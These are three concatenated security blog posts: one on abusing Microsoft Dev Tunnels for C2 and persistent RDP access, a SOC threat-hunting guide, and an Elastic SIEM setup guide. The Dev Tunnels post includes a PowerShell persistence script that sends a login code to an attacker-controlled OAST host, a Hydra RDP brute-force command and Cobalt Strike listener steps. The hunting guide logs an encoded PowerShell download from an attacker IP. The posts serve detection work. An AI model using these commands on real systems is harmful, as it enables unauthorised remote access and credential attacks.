
Microsoft Dev Tunnels: Tunnelling C2 and More

Attackers are always looking for ways to blend into an environment and establish a C2 channel undetected. Utilising legitimate tooling for malicious activity is a common way they achieve this.

From a defender’s standpoint, spotting activity that’s meant to blend in can be quite challenging. A SOC team, especially one experiencing alert fatigue, might often resort to checking a domain or hash on VirusTotal. If it’s a known domain or hash, particularly one signed or trusted by Microsoft, they might quickly label it as a false positive and move on.

Microsoft Dev Tunnels

Dev Tunnels allow developers to expose services running locally to remote hosts across the internet, tunnelled through Microsoft infrastructure. For example, say I have a simple web server running on my PC and I want a colleague to be able to test the web page I’ve created. I can use a Dev Tunnel to expose port 443 on my host. A Microsoft Dev Tunnels domain (*.devtunnels.ms) is generated; I provide the URL to my colleague, and they can access the web service on my local host via the Microsoft URL.

I can expose any service via the Dev Tunnels, including RDP and SSH. With the ability to tunnel traffic using Microsoft domains, you can imagine why this would be an attractive concept to attackers.

There have been increased reports of threat actors utilising Microsoft Dev Tunnels and other legitimate remote tools in their campaigns. So, let’s walk through the different ways Dev Tunnels can be abused by attackers.

Scenario One: Using for C2

Firstly, using Dev Tunnels for C2. Take the diagram below as an example. A victim PC has executed a payload, and the C2 beacon is configured to connect to a Microsoft Dev Tunnels domain.

In most environments, the domain will pass through any proxy or firewall, due to the domain belonging to Microsoft. The traffic is then forwarded by Microsoft to the attacker’s machine.

Dev Tunnel Diagram

Creating a tunnel

From the attacker’s perspective, all they need to do is install the devtunnel binary, which is available for macOS, Linux, and Windows.

Some key details on establishing a tunnel are below, followed by a rough sketch of the CLI workflow:

  • Authentication: To create a tunnel, you need to authenticate with either a personal GitHub or Microsoft account. Setting up an account with either is trivial.
  • Anonymous Access: You can configure a tunnel to allow anonymous access, letting anyone connect to your tunnel.
  • Tunnel ID: When a tunnel is created, a tunnel ID is generated; this is used to connect two endpoints together through the tunnel.
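On the attacker’s machine, standing up a tunnel looks roughly like the following. This is a sketch using the devtunnel CLI; exact sub-commands and output can vary between CLI versions.

devtunnel user login            # authenticate with a Microsoft or GitHub account
devtunnel create                # create a tunnel; a tunnel ID is returned
devtunnel port create -p 443    # expose local port 443 through the tunnel
devtunnel host                  # start hosting; a *.devtunnels.ms URL is printed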

The highlighted URL below is what we will use for our C2 beacon.

Dev Tunnel C2 URL

Establishing C2

The process for utilising a Dev Tunnel domain for C2 traffic will be similar across different C2 frameworks. Below is an example of creating a listener in Cobalt Strike.

  1. Select Beacon Type, usually HTTPS.
  2. Define the HTTPS host to listen on, in this case, it would be our tunnel domain, 8kl69l904-443.uks1.devtunnels.ms
  3. Define the HTTPS host (stager), the IP of your team server.
  4. Select HTTPS Port, 443.
Dev Tunnel Cobalt Strike

Example Event

In the event shown below, we can see connections to our tunnel domain, from our beacon process. The beacon process is a fake OneDrive binary, which has a forged Microsoft certificate.

@timestamp | dns.question.name | process.code_signature.subject_name | process.name | user.name | process.code_signature.trusted
Sep 1, 2024 @ 11:44:50.169 | 8kl6l904-443.uks1.devtunnels.ms | www.microsoft.com | OneDrive.exe | paul | false
Sep 1, 2024 @ 11:44:50.148 | 8kl6l904-443.uks1.devtunnels.ms | www.microsoft.com | OneDrive.exe | paul | false
Aug 31, 2024 @ 23:00:18.669 | 8kl6l904-443.uks1.devtunnels.ms | www.microsoft.com | OneDrive.exe | paul | false
Aug 31, 2024 @ 23:00:18.649 | 8kl6l904-443.uks1.devtunnels.ms | www.microsoft.com | OneDrive.exe | paul | false
We’ve given our payload a fake certificate; it’s signed, but not trusted.
Cobalt Strike Signed Binary
Elastic EDR Dev Tunnel Tree

Detecting Dev Tunnel C2

Detecting the usage of Dev Tunnels for C2 is challenging, as the Dev Tunnels binary does not need to be present on the target host. In cases where EDR or endpoint controls fail to detect the initial payload, relying on network-based telemetry alone is difficult. As expected, the TLS connections present valid certificates; they are, after all, legitimate Microsoft domains.

Dev Tunnel Domain Signed

We can look to identify C2 traffic by looking for constant connections to the Dev Tunnel domains over sustained periods.

Dev Tunnel C2 Detect

Below is the query used in Timelion to generate the above:

.es(
  index='.ds-logs-network_traffic*',
  q='destination.domain: *.uks1.devtunnels.ms',
  timefield='@timestamp',
  metric='count'
).bars(),
.es(
  index='.ds-logs-network_traffic*',
  q='destination.domain: *.uks1.devtunnels.ms',
  timefield='@timestamp',
  metric='cardinality:destination.domain'
).lines(width=2, stack=false).label("Unique Domains")

We can also use more generic C2 detection methods, looking for high-volume connections to single domains. The chart below shows the count of connections to individual domains over a 24-hour period. We can see clear outliers for our Dev Tunnel C2 domains, where constant connections are made.

Dev Tunnel C2 Detect

Network with Endpoint Telemetry

Many EDR products are now able to join domain requests with the process responsible for making the request, and can usually enrich the binary with certificate information. Looking for connections to Dev Tunnel domains from an unsigned or untrusted binary can therefore be another method of detection.

dns.question.name : *.uks1.devtunnels.ms and process.code_signature.trusted : false

This, however, will not help for payloads running from a trusted source. For example, sideloading or injecting a payload into a trusted process like Outlook will be more difficult to detect.

As shown below, loading a secondary payload into Outlook results in C2 traffic to a trusted Microsoft domain from a trusted Microsoft process.

Dev Tunnels C2 from trusted Process

In these cases, anomaly-based detection of C2 over the Dev Tunnel domains would be required, with analysts paying attention to the surrounding and contextual activity, such as unusual module loads or injection into the process making the requests.


Scenario Two: Using for Persistent Access

Dev Tunnels can be used for more than just C2. As we said before, any port can be exposed for remote usage. Therefore, RDP and SSH are good candidates, allowing a threat actor to establish persistent remote access.

Ideally, we would want a scripted method of establishing and maintaining remote access via Dev Tunnels.

I created a simple PowerShell script that does the following on a victim host (a rough sketch of such a script follows the list).

  • Downloads a copy of Dev Tunnels and places it in a Windows Start-Up Location.
    • Download from: https://aka.ms/TunnelsCliDownload/win-x64
    • Place in: C:\Users\paul\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
  • Authenticates the Dev Tunnel process to an account.
    • More on this further down.
  • Sets up a tunnel, exposing port 3389 to allow for anonymous access.
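A minimal sketch of what such a script might look like is below. This is hypothetical: the paths, sleep timings, device-code pattern, and the interactsh/OAST URL are placeholders, and a real script would need error handling.

# Hypothetical sketch only: paths, timings, and the OAST domain are placeholders
$startup = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
$exe     = Join-Path $startup "devtunnel.exe"

# 1. Download the Dev Tunnels CLI into a start-up location
Invoke-WebRequest -Uri "https://aka.ms/TunnelsCliDownload/win-x64" -OutFile $exe

# 2. Kick off GitHub device-code login and capture the code it writes to stdout
$log = Join-Path $env:TEMP "dt-login.txt"
Start-Process -FilePath $exe -ArgumentList "user login -g -d" -RedirectStandardOutput $log
Start-Sleep -Seconds 15
# GitHub device codes are typically in the form XXXX-XXXX (assumption)
$code = (Select-String -Path $log -Pattern "[A-Z0-9]{4}-[A-Z0-9]{4}" | Select-Object -First 1).Matches.Value

# 3. Send the device code to an attacker-controlled interactsh/OAST domain (placeholder URL)
Invoke-RestMethod -Uri "https://example.oast.fun" -Method Post -Body $code

# 4. Once the attacker approves the code at github.com/login/device,
#    expose RDP over an anonymous tunnel (flag spelling as used in the host command later in this post)
Start-Sleep -Seconds 120
& $exe host -p 3389 -allow-anonymous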

Github Device Authentication

When first using Dev Tunnels on a device, you must authenticate. To do this in a scripted manner, we can use GitHub Device authentication:

devtunnel user login -g -d
The -g flag logs in with a GitHub account, and -d uses device-code login for when a local interactive browser login isn’t possible.

When this command is run, a device login code is written to the terminal. Using our PowerShell script, we can capture this code by writing it to a .txt file. We can then pull the string from the file, and send it to ourselves.

Dev Tunnel Script

We can use interactsh to receive the login code, by sending a POST request to our OAST domain from the PowerShell script.

Dev Tunnel Git Login Code

We can then use the device code to authenticate to our attacker-controlled GitHub account via https://github.com/login/device

Dev Tunnel Git Auth

Establishing Tunnel

Now that we’ve authenticated, our PowerShell script can continue, by setting up a tunnel.

This is as easy as running a command like the one below. Port 3389 is being exposed and allows for anonymous login.

.\devtunnel.exe host -p 3389 -allow-anonymous

Dev Tunnel Setup via Script

Now that the tunnel is setup, we can authenticate to the same GitHub account from our attacker machine.

We can list out tunnels that are running within our account, and connect to the tunnel exposing RDP on our victim device by specifying the tunnel ID.
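On the attacker machine, that might look something like the following (a sketch; sub-command names can differ slightly between devtunnel CLI versions):

devtunnel list                  # list tunnels available to the authenticated account
devtunnel connect <tunnel-id>   # connect and forward the victim's exposed port to localhost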

Dev Tunnel RDP

In order to connect via RDP we need to authenticate to a user on the device. If we do not already have a compromised user, we can brute force RDP via the tunnel.

Traffic is forwarded from localhost, through the tunnel, to our victim host on port 3389. Therefore, to brute force, we specify localhost as our target, and we’re able to brute force RDP on our victim host.
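Using a tool like Hydra, for example, this could look something like the command below. The username and wordlist are hypothetical, and the forwarded local port may differ from 3389 depending on how the tunnel client maps it.

hydra -t 1 -V -l administrator -P passwords.txt rdp://127.0.0.1 -s 3389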

Dev Tunnel RDP Brute Force

Once we have an account to utilise, we can use an RDP client to connect, again specifying the localhost address as the remote host and authenticating with our compromised user.

Dev Tunnel RDP Connect
Dev Tunnel RDP Connect

This means you could, in theory, expose a host remotely via a single PowerShell script, making it a candidate for delivery via phishing. It can also be a method of bypassing RDP restrictions on a network, exposing internal hosts remotely.

Detections

I’m using Elastic SIEM and Endpoint agent to collect telemetry and build custom detections.

Dev Tunnel Binary Execution Detection

In circumstances where an attacker has brought the Dev Tunnel binary onto disk, you could catch them with a simple:

Process.Name:devtunnel.exe OR File.Name:devtunnel.exe

But any decent operator is going to rename the process to something else.

You could look for the initial download, via PowerShell or WinGet

CommandLine= "*winget install Microsoft.devtunnel*"
OR 
URL= "*https://aka.ms/TunnelsCliDownload/win-x64*"

But again, these are easy to bypass, and an attacker will likely bring the tool down from their own infrastructure.

A more robust detection method is to look for a particular DLL that the tunnel requires for operation. Looking at module load events, there are a variety of DLLs loaded by devtunnel.exe, but one stands out as an easy detection: devtunnel.dll.

event.action: "load" and dll.name: "devtunnel.dll"

The DLL is loaded from a temp .net directory that is created on execution. This is a behaviour that an attacker would not be able to manipulate.

Tunnelling RDP Detection

You’ll notice the source IP in the logs for this activity is displayed as ::1, the IPv6 loopback address for the host (the equivalent of 127.0.0.1). As we are forwarding traffic from localhost on our attacker machine to the victim machine, this is the address that is displayed.

Dev Tunnel RDP

Interestingly, the logon type is captured as type 3, rather than type 10. The query below will show both successful and failed logons originating from a loopback address. Putting this into a detection would likely generate a lot of noise and false positives.

event.provider: "Microsoft-Windows-Security-Auditing" and (event.code: "4624" or event.code: "4625") and (source.ip: "::1" or source.ip: "127.0.0.1")

Instead we can use a threshold detection to attempt to detect suspected brute forcing, from a loopback address.

Dev Tunnel RDP Brute Force Detect
Dev Tunnel RDP Brute Force Detect
Dev Tunnel RDP Brute Force Detect

Incident Response Triage & Logging

Unfortunately there is very little in the way of logging for Dev Tunnels. Unlike Microsoft VS Code Remote Tunnels, which are a different implementation of the same underlying tunnel features (more on how they can be abused another time), there is no dedicated logging for tunnel usage.

If you’re responding to an incident that involves the use of Dev Tunnels, and you do not have host or network telemetry, then your best option is to dump the Dev Tunnel process. We can get all the key information from the process dump.

Dev Tunnel URL from Memory
Dev Tunnel ID from Memory

Including the username the tunnel authenticated with.

Dev Tunnel username from Memory

Closing Thoughts

As shown, Dev Tunnels provide powerful capabilities that can be (and are) abused by Threat Actors to make detection by Blue Teams more difficult. The best option is to outright block tunnel usage in the estate; this can be achieved by blocking the Dev Tunnel domains listed below.

IOCs

File Hashes

FileName | SHA256
Devtunnel.exe | cb2d8470a77930221f23415a57bc5d6901b89de6c091a3cfbc563e4bf0e7b4eb
devtunnel.dll | c0513783d569051bdc230587729b1da881f7032c2ad6e8fedbbdcc61d813da25

Domains

Description | Domain
Dev Tunnel Domain | global.rel.tunnels.api.visualstudio.com
Dev Tunnel Domain | *.rel.tunnels.api.visualstudio.com
Dev Tunnel Domain | *-data.rel.tunnels.api.visualstudio.com
Dev Tunnel Domain | *.devtunnels.ms
GitHub Device Auth URL | https://github.com/login/device
Tunnel Install URL | https://aka.ms/TunnelsCliDownload/win-x64

A Guide to Threat Hunting in a SOC

Introduction

You’d be forgiven for thinking that Threat Hunting is just another Cyber Buzz Word/Phrase spreading throughout the industry, the latest term used to push more product and managed services on a SOC. The reality, however, is that Threat Hunting is an extremely valuable skill and one that every SOC should have.

In fact, I believe that Threat Hunting provides more value than the traditional approach that many SOCs take: switching on pre-made generic rules from a range of cyber tools like AV and IDS, as well as ingesting IOCs from intel providers and searching for them across the estate.

This typical approach is what I call a reactive model. A team of analysts sit around waiting for alerts from different tools to trigger; they then triage the alerts and perform an investigation.

In my view, there are a few issues with this approach.

The issues

  • False Positives: Many generic alerts can be prone to false positives. Vendors design rules to work on many different estates. They’re not designed to work on your specific estate. Additionally, with IOCs, bad intel from a provider can generate a lot of noise on your estate.
    • Of course, rules can be tuned to perform better and cut false positive noise. But this is not always easy or even possible.
    • Additionally, false positives play a huge role in creating analyst fatigue. Investigating and closing the same false positives day after day will quickly cause analysts to become frustrated, and lose interest. Team productivity will drop as a result.
    • If analysts are used to closing false positives all the time, chances are they’ll wrongly close a true positive as a false positive for rules that are particularly noisy.
  • Detection Gaps: With a reactive approach, you’re relying on the rules that you have to detect the full spectrum of malicious activity.
    • It requires you to have good detection coverage, but also requires you to have a complete picture of your detection coverage and your detection gaps.
    • Using frameworks like Mitre is incredibly useful for finding gaps in coverage. However, the reality is most SOCs do not have their coverage mapped to a framework.
    • Red Teams can help find gaps in detection coverage. However, most SOCs will only perform one Red Team a year, and a lot can change in a year.

A Different Approach

Some SOCs do already perform threat hunting on their estates, but in most cases this is conducted sporadically when there’s some free time. Free time can be hard to come by when you’re closing false positives all day.

What if, instead of spending 90% of the time reacting to alerts, the focus was switched to a proactive model? What if 90% of the time was spent threat hunting instead? What impact would that have?

The Benefits

  • Assume Breach: Assume Breach is a common phrase in the industry. It’s a mentality that analysts are encouraged to have when triaging alerts, “assume there’s been a breach”. But sitting around waiting for alerts to come in doesn’t practice this mentality. However, with a Threat Hunting focused approach, you’re forced to hold this mentality, as you’re actively looking for threats and successful breaches.
  • Being Proactive: Being proactive and looking for threats is a better use of time than sitting around waiting for alerts to come in.
    • You’re not reliant on rules and detections you have, and you can hunt for activity where you have detection gaps.
  • Team Productivity: Analysts will be more productive. If they’re hunting for new and interesting activity each day, they’ll be more engaged and interested in their work.
    • Good research-based threat hunting takes skill, and analysts will develop their technical knowledge by conducting in-depth research before hunts.

Understanding Threat Hunting

So we now know the benefits of Threat Hunting, but what actually is it? And how can you do it?

Well, the first thing to make clear is that Threat Hunting is not taking a bunch of IPs and other IOCs and searching for them across your estate. Take a look at the pyramid below. It’s called the Pyramid of Pain. What this pyramid illustrates is the “pain” or effort an attacker will experience if you are able to detect an indicator in each block.

Pyramid of Pain

For example, take the tool Mimikatz. If you detect Mimikatz based on its hash value, it would be trivial for an attacker to change the hash of the binary, thereby bypassing your detection. However, if you detected Mimikatz by looking for uncommon processes establishing a handle to LSASS, that would be significantly harder for an attacker to bypass. Additionally, you would also detect other attack tools which target LSASS.
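For instance, a hunt for the LSASS behaviour just described could start from Sysmon Event ID 10 (ProcessAccess) data. A rough sketch, assuming Sysmon events shipped via Winlogbeat and using an illustrative (far from complete) exclusion list; field names will differ in other pipelines:

event.provider: "Microsoft-Windows-Sysmon" and event.code: "10" and winlog.event_data.TargetImage: *\\lsass.exe and not winlog.event_data.SourceImage: (*\\MsMpEng.exe or *\\csrss.exe or *\\wmiprvse.exe)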

Threat hunting should be focused on the top two blocks of the pyramid, TTPs and Tools.

Threat Hunt Model

There are countless threat hunting models available on the internet, but most of them are more or less the same. The typical model looks like this:

Threat hunt model
  • Research: This is one of the phases that I often see overlooked, and it’s what kicks off your threat hunt. Research can come from a variety of places: maybe you see a new PoC for a tool being shared on Twitter, or maybe you read a blog on a new attack vector. Regardless, this kick-starts your hunt. From here, you dig deeper and investigate the attack vector.
  • Data and Telemetry: Once you have an understanding of the attack vector, you need to establish whether or not you have the correct data set to detect the threat. Whether it be proxy logs, endpoint logs, or something else.
  • Build Hypothesis: This is where you establish the logic of your hunt analytic. This stage is closely linked to the research phase. In my experience, the best way to build a hypothesis is to first test the attack vector. Build a lab and practice using the attack tool, or experiment with the attack vector. Once you’ve successfully experimented, review your logs. Observe what data was collected.
  • Create Hunt Analytic: Next you need to formulate your search. This is essentially where you test your hypothesis against your data & telemetry. A hunt analytic could be anything from a parent and child process relationship or maybe a specific filename and command line value.
  • Investigate and Incident Response: This obviously only occurs if you find some badness while hunting.
  • Tune Review Analytic: Here is where you improve your search to cut out the noise. Likewise, if it’s been turned into an automated analytic, refine it to cut out any false positives.

Let’s Get Technical – Demo

Let’s take a look at a threat hunting example by exploring some lateral movement techniques using Cobalt Strike and Impacket. Neither of these techniques is detected by some of the best EDRs on the market, which makes them good candidates for threat hunts.

It’s worth bearing in mind that while EDRs are great tools that have really enhanced the detection capabilities of many organisations around the world, they’re not perfect. They can be bypassed and there are gaps in their coverage. You should never be reliant on just one security tool, and this again proves the value of threat hunting.

Testing Environment

The test environment is made up of two hosts, a desktop PC and a Domain Controller. A market-leading EDR (that shall remain nameless) is installed on the DC. Both hosts have Sysmon running on them with the SwiftOnSecurity Sysmon Config, and these logs are being fed into ELK.

If you’d like to see how to setup ELK SIEM, you can see my previous blog here.

Attackers Perspective

First, let’s paint the picture of what the attacker has done on our hosts, so it’s clearer what we’re threat hunting for.

  1. User HR was sent a malicious link to a .hta file, which when opened, executes a malicious payload to spawn a Cobalt Strike Beacon running under the user’s context.
  2. As the user does not have admin privileges, the attacker performed privilege escalation. This was done by uploading a secondary payload to the host (via the beacon) and executing it under escalated context using the fodhelper UAC bypass.
  3. This gives us a new beacon running under a higher privileged context. From here, credentials on the host were dumped using Mimikatz via the beacon.
  4. The next step is where we’re going to perform our lateral movement.
    1. Before we do, it’s worth mentioning that a lot of the above activity would have been detected by most EDRs, but there are obviously other ways to achieve the same objectives which can go undetected.
    2. The first method of lateral movement is using wmiexec from Impacket. Using the administrator’s credentials stolen with Mimikatz, we are able to get an interactive shell to the domain controller. Let’s see what using wmiexec looks like, and how we can detect it in a hunt.
Cobalt Strike Attack Tree

WMIEXEC

As wmiexec is open source and the code is available on GitHub, one of the things we might do as part of our research phase is analyse the tool’s code. One part of the code that sticks out is the remote shell function. We can see here that cmd.exe is being launched with the flags “/Q /c”. We also know that WmiPrvSE.exe is likely to be the parent of cmd.exe, as it’s WMI we’re using to establish our shell.

class RemoteShell(cmd.Cmd):

    .......................................

        self.__output = '\\' + OUTPUT_FILENAME
        self.__outputBuffer = str('')
        self.__shell = 'cmd.exe /Q /c '
        self.__shell_type = shell_type

    ........................................

        self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'

With that in mind, we can use a query like the one below to search for cmd.exe as a child of WmiPrvSE.exe with a command line of “cmd.exe /Q /c” followed by a wildcard.

process.parent.name : "WmiPrvSE.exe" and process.pe.original_file_name: Cmd.Exe and process.command_line :   cmd.exe /Q /c *

Searching on this activity returned a few results, including this event.

Process Create:
 RuleName: -
 UtcTime: 2021-06-27 16:31:42.163
 ProcessGuid: {75D30705-A7EE-60D8-2748-0E0000000000}
 ProcessId: 4956
 Image: C:\Windows\System32\cmd.exe
 FileVersion: 10.0.14393.0 (rs1_release.160715-1616)
 Description: Windows Command Processor
 Product: Microsoft® Windows® Operating System
 Company: Microsoft Corporation
 OriginalFileName: Cmd.Exe
 CommandLine: cmd.exe /Q /c powershell.exe -exec bypass -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAxADkALgAxADMANwA6ADgAMAAvAGQAbwB3AG4AbABvAGEAZAAvAG4AZgBzAC4AZQB4AGUAJwAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAXABEAG8AdwBuAGwAbwBhAGQAcwBcAG4AZgBzAC4AZQB4AGUAIgA= 1> \127.0.0.1\ADMIN$__1624811482.3061206 2>&1
 CurrentDirectory: C:\
 User: RT-LAB\Administrator
 LogonGuid: {75D30705-A7DA-60D8-9E31-0E0000000000}
 LogonId: 0xE319E
 TerminalSessionId: 0
 IntegrityLevel: High
 Hashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A
 ParentProcessGuid: {75D30705-A634-60D8-BC12-050000000000}
 ParentProcessId: 3868
 ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
 ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

There’s some interesting stuff here. Based on the command line, it looks like a base64-encoded PowerShell command is being executed, with the output of the command written to a temp file in an admin share.
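Decoding the base64 (UTF-16LE, as used by PowerShell’s -enc flag) gives a command along these lines:

powershell -command "Invoke-WebRequest -Uri 'http://192.168.119.137:80/download/nfs.exe' -OutFile C:\Users\Administrator\Downloads\nfs.exe"

So wmiexec is being used to launch PowerShell and pull a second executable down onto the domain controller.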

We can use the writing of a file to an admin share to improve our search query.

FYI, the use of wmiexec to launch PowerShell to then download a malicious executable went undetected by our EDR.

Hunt Performance

Our original query from before returned over 70 hits over a 30 day period on an estate with over 20,000 devices. That’s not bad, but we can improve our hunt query using the new information we now have.

process.parent.name : "WmiPrvSE.exe" and process.pe.original_file_name: Cmd.Exe and process.command_line: \\127.0.0.1\ADMIN$

Running the query above returned hits for only our attacker activity and nothing else, making it a good hunt. We could probably turn this into a high-confidence detection based on the 0% false-positive rate.

Lateral Movement with Cobalt Strike

Interestingly wmiexec isn’t the only attack tool that utilises the admin share. The “Jump” function that can be run from a Cobalt Strike beacon also writes a file into the admin share. If we look at the Lateral Movement (Spawn a Session) section of the Cobalt Strike Beacon Documentation we can see multiple functions that use the admin share.

Cobalt Strike Jump

If we look in our logs, we can see quite a few useful entries for this activity that we can build hunts on.

Registry key added

We can see details of a registry key being added to the host as part of the creation of a new service.

Registry value set:
 RuleName: T1031,T1050
 EventType: SetValue
 UtcTime: 2021-06-27 21:38:44.784
 ProcessGuid: {75D30705-602A-60D7-E044-010000000000}
 ProcessId: 984
 Image: C:\Windows\system32\services.exe
 TargetObject: HKLM\System\CurrentControlSet\Services\0134ebf\ImagePath
 Details: \\GSOC-Lab-DC\ADMIN$\0134ebf.exe
 winlog.event_data.Details: \\GSOC-Lab-DC\ADMIN$\0134ebf.exe
 winlog.event_data.EventType: SetValue
 winlog.event_data.TargetObject: HKLM\System\CurrentControlSet\Services\0134ebf\ImagePath

New Service

There’s a separate event for the installation of a new service, again with our new executable included.

A service was installed in the system.
 Service Name:  0134ebf
 Service File Name:  \\GSOC-Lab-DC\ADMIN$\0134ebf.exe
 Service Type:  user mode service
 Service Start Type:  demand start
 Service Account:  LocalSystem

Process Creation

And finally we have the execution of the process.

Process Create:
 RuleName: -
 UtcTime: 2021-06-27 21:38:45.122
 ProcessGuid: {75D30705-EFE5-60D8-C3FA-260000000000}
 ProcessId: 1352
 Image: \\GSOC-Lab-DC\ADMIN$\0134ebf.exe
 FileVersion: -
 Description: -
 Product: -
 Company: -
 OriginalFileName: -
 CommandLine: \\GSOC-Lab-DC\ADMIN$\0134ebf.exe
 CurrentDirectory: C:\Windows\system32\
 User: NT AUTHORITY\SYSTEM
 LogonGuid: {75D30705-602B-60D7-E703-000000000000}
 LogonId: 0x3E7
 TerminalSessionId: 0
 IntegrityLevel: System
 Hashes: MD5=F43CA9DC11F486ED49BFF32C9A9AE78B,SHA256=A5EE87651D03534C449DA842C768903060C6CDF22A9896C6C66720CF313949C5,IMPHASH=BED5688A4A2B5EA6984115B458755E90
 ParentProcessGuid: {75D30705-602A-60D7-E044-010000000000}
 ParentProcessId: 984
 ParentImage: C:\Windows\System32\services.exe
 ParentCommandLine: C:\Windows\system32\services.exe

Hunting for this activity

There are a few things we could hunt for to find this activity in the future; an example query for the first is sketched after the list.

  • Creation of a new service where the service file name includes the admin share.
  • Creation of a registry key by services.exe which calls a file in the admin share.
  • Process creation of a file located in the admin share with services.exe as the parent.
  • File written to disk in the admin share where file name matches the following regex “.admin\$\/[a-zA-Z0-9]{7}\.exe$”
    • When Cobalt Strike writes a file to the admin share, it generates a random file name consisting of 7 alphanumerical characters. This regex I’ve created here may need to be modified depending on the regex flavour you use.
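As a rough sketch of the first hunt idea, assuming Windows System event logs are shipped via Winlogbeat (the raw 7045 “service installed” event data sits under winlog.event_data; field names will differ in other pipelines):

event.code: "7045" and winlog.event_data.ImagePath: *ADMIN$*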

What you need to hunt

To develop an effective basic threat hunting function in your SOC you do not need much.

  • Mitre Mapping: I would recommend mapping your hunts to Mitre; this will help you keep track of which coverage gaps you have hunted and which need more focus.
  • Plan: Plan your hunts. This saves analysts from hunting for the same things and duplicating work.
  • Talented Analysts: Threat hunting is not easy, and it takes time and skill to perform research and develop hunts from research. Give your analysts the time, freedom and resources to perform research and hunts.
  • Logs: Make sure you have the basic logs coming into your SIEM or Search Platform. Proxy logs, endpoint logs (whether EDR or Sysmon), Authentication logs, etc…
  • Alerting: Believe it or not, I’m not against alerting and use cases, just low-quality ones. For hunts that produce a very low false-positive rate, hunt logic can be used to create a detection alert. Alerting obviously plays an important role in any SOC and needs to work alongside threat hunting.

Closing Thoughts

At the beginning of this post, I said that SOCs should spend 90% of their time threat hunting and 10% of time dealing with alerts and tickets. This is obviously not realistic. But what I think every SOC should do is put more resources into research-based threat hunting, and use that process to create high confidence detections. I generally do think at least 60% of analysts’ time should be spent researching and threat hunting on the estate. I believe that this can have a lot more value than spending the majority of the time responding to low-quality false positives.

A well-developed Threat Hunting function will aim to automate hunts and generate threat leads for analysts to pick up and investigate. In my mind, this could be used in place of generic, low-quality detections.

More to come…

I’ll be releasing another post soon on how you can take threat hunting to the next level and how you can incorporate the Sqrrl Framework to improve your threat hunt capability, as well as how you can automate threat hunts with a SOAR.

I’ll also be releasing some mini-posts on creating detections for common attack tools like Cobalt Strike and Impacket.

How to install Elastic SIEM and Elastic EDR

Installing Elastic EDR & SIEM

A few months ago I released a couple of blog posts on how to create enterprise monitoring at home with ELK and Zeek. This post is a continuation of that series... sort of. A lot has changed since those posts, mainly updates to the ELK stack and the release of a number of free EDR tools: OpenEDR, released by Comodo, and Elastic EDR. So I thought now would be a good time to see what’s changed with Elastic and try out their new EDR. In this post, I’m going to show how to install Elastic SIEM and Elastic EDR from scratch.

Network Design

Below is a very simple network diagram for this post. ELK is running on a Ubuntu 20.04 Server hosted on ESXi. Zeek is also running on a Ubuntu 20.04 server, and a port on my switch is being mirrored to a port on my ESXi server. You can read more about Zeek and port mirroring in my previous blog here.

Also running on ESXi is a Windows 10 machine, where we will install the Elastic EDR agent. I also have a Windows AD machine. This host does not feature in this post but will be used in future posts where I perform additional testing with the Elastic EDR.

Elastic SIEM network

Installing ELK Basics

I’m going to breeze through this section, as I’ve covered it before, and there are tons of guides out there already on how to get a basic ELK setup working. In my case, I’m using the newest release of ELK which is 7.10.

For my ELK setup, I’m using a single Ubuntu Server 20.04 virtual machine running on ESXi. This server will run Elasticsearch and Kibana.

First, install curl and apt-transport-https:

apt-get install curl apt-transport-https

Next add the Elastic repositories to your source list.

curl -s https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | tee /etc/apt/sources.list.d/elastic-7.x.list

Then update.

apt-get update

Now install Elasticsearch

apt-get install elasticsearch 

Once Elasticsearch is installed, we need to make a couple of changes to its configuration file, located at /etc/elasticsearch/elasticsearch.yml. In order to edit this file, you need root privileges.

First, we need to change the network.host value. Its default is set to the localhost. Change it to the IP address of the host you installed Elasticsearch onto.

network.host: <elasticsearch_ip>

Next within the same file, we need to change two node name values. In my case, I’ve just set both values to node-1

node.name: <node_name>
cluster.initial_master_nodes: ["<node_name>"]

Now you should be ready to start Elasticsearch and check that it’s started correctly.

service elasticsearch start
service elasticsearch status

You can also check that Elasticsearch is accessible from other hosts by running:

curl http://<elasticsearch_ip>:9200

The output should look similar to the one below, (Disclosure: this pic is stolen from my previous ELK post, hence why the details don’t match my new deployment)

Elasticsearch install

Installing Kibana

Run the command below to install Kibana.

apt-get install kibana

Once the installation is complete, edit your /etc/kibana/kibana.yml and specify the IP address hosting Kibana.

server.host: "Your_IP"

In the same file, also specify the IP address of your Elastic Instance.

elasticsearch.hosts: ["http://Your_ElasticSearch_IP:9200"]

Start Kibana and check its status.

service kibana start
service kibana status

Installing Beats

Filebeat is used to ship data from devices to Elasticsearch. There are a number of different Filebeat modules for different products that send logs and data to Elasticsearch in the required format. In this example, we’re using the module for Zeek, but Elastic has greatly expanded its support for additional products in recent months, including AWS, CrowdStrike, ZScaler and more.

For now, we’re just going to install Filebeat on our host running Zeek, we’ll worry about configuring it later.

apt-get install filebeat

Configuring X-Pack

As it stands, the only functionality we have within our ELK deployment is log ingestion and visualisation. We can ingest logs into Elasticsearch and manipulate the data with Kibana visualisations, but the core functionality of a SIEM is missing: we’re unable to build detections or use cases. This feature is not available “out of the box”, and in order to use it, we must first configure security between all of our different nodes. X-Pack is the Elastic package that is responsible for the Elastic Security functionality.

One key requirement is to configure SSL connections between each node; there are a number of ways to do this, and we are going to use X-Pack for this as well.

Firstly, on the host with Elasticsearch installed, we need to create a YAML file, /usr/share/elasticsearch/instances.yml which is going to contain the different nodes/instances that we want to secure with SSL. In my case, I only have Elasticsearch, Kibana and Zeek.

instances:
    - name: "elasticsearch"
      ip:
        - "192.168.1.232"
    - name: "kibana"
      ip:
        - "192.168.1.232"
